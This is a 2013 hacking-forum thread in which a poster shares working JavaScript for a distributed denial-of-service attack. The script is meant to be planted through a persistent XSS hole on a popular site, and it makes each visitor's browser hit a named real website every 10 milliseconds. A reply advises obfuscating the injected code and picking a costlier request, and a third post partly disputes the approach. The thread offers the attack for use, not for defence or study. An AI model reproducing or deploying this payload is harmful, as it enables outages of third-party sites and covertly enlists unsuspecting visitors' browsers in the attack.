Using Javascript For A DDoS

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Using Javascript For A DDoS

Post by Th3_M4d_H4tt3r on Wed Jul 10, 2013 4:43 am
([msg=76401]see Using Javascript For A DDoS[/msg])

Alright, your all like "javascript cleint side, jeez!"

well,all you have to do is find a persistent XSS vuln in a popular website and insert this javascript:
Code: Select all
<script>
/*
javascript DoS by Th3_M4d_H4tt3r
*/

function imgflood() {
   var TARGET = 'www.banknoteworld.com' //target
   var URI = '/index.php?x=HAH_GAYYYYY' //URI, make sure it starts with '/'
   var pic = new Image()
   var rand = Math.floor(Math.random() * 1000)
   pic.src = 'http://'+TARGET+URI+'&'+rand+"=asdf"
}

setInterval(imgflood, 10)

</script>


it will auto-execute and whoever views the attacked page will begin attacking the site C:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: Using Javascript For A DDoS

Post by 0phidian on Sat Jul 13, 2013 10:52 am
([msg=76437]see Re: Using Javascript For A DDoS[/msg])

So if I understand this right you're just sending lots of requests to the target for images that do not exist? So it would not really be effective unless the xssed site got a whole lot of traffic, but you did say popular site. So, depending on the site, I'm not sure that would be enough to take down a server.

It would work better if you found a DOS exploit in the target.
Such as the good old index.php?page=index.php
and have your script send repeated requests for that.

You might also want to obfuscate your code before injecting it. Over all I think using xss for a DDOS is decent idea.
User avatar
0phidian
Poster
Poster
 
Posts: 243
Joined: Sat Jun 16, 2012 7:04 pm
Blog: View Blog (0)


Re: Using Javascript For A DDoS

Post by -Ninjex- on Sat Jul 13, 2013 11:09 am
([msg=76439]see Re: Using Javascript For A DDoS[/msg])

0phidian wrote:It would work better if you found a DOS exploit in the target.
Such as the good old index.php?page=index.php


This really isn't an exploit, it's simply a get parameter from underlying php code on the site.
Yes, repeating a request to a site can cause DoS, but it would take a lot of request from one person to accomplish this. However, you don't need a get parameter to send any type of request to the server, it could be as simple as 1,000 users constantly hitting the F5 to refresh their page on the index page of the site (DDoS).

Ophidian wrote:Over all I think using xss for a DDOS is decent idea.


I think if a site has a persistent xss vuln, I would be doing a lot more creative things, other than flooding their services.
Spreading knowledge just once a day, can help keep the script kiddies away ⠠⠵
no_hope if world.map{|person, ic = 0| ic +=1 if ignorance.include?(person)}.compact.length > (world.length / 2)
The absence of evidence is not evidence of absence.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1061
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)



Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests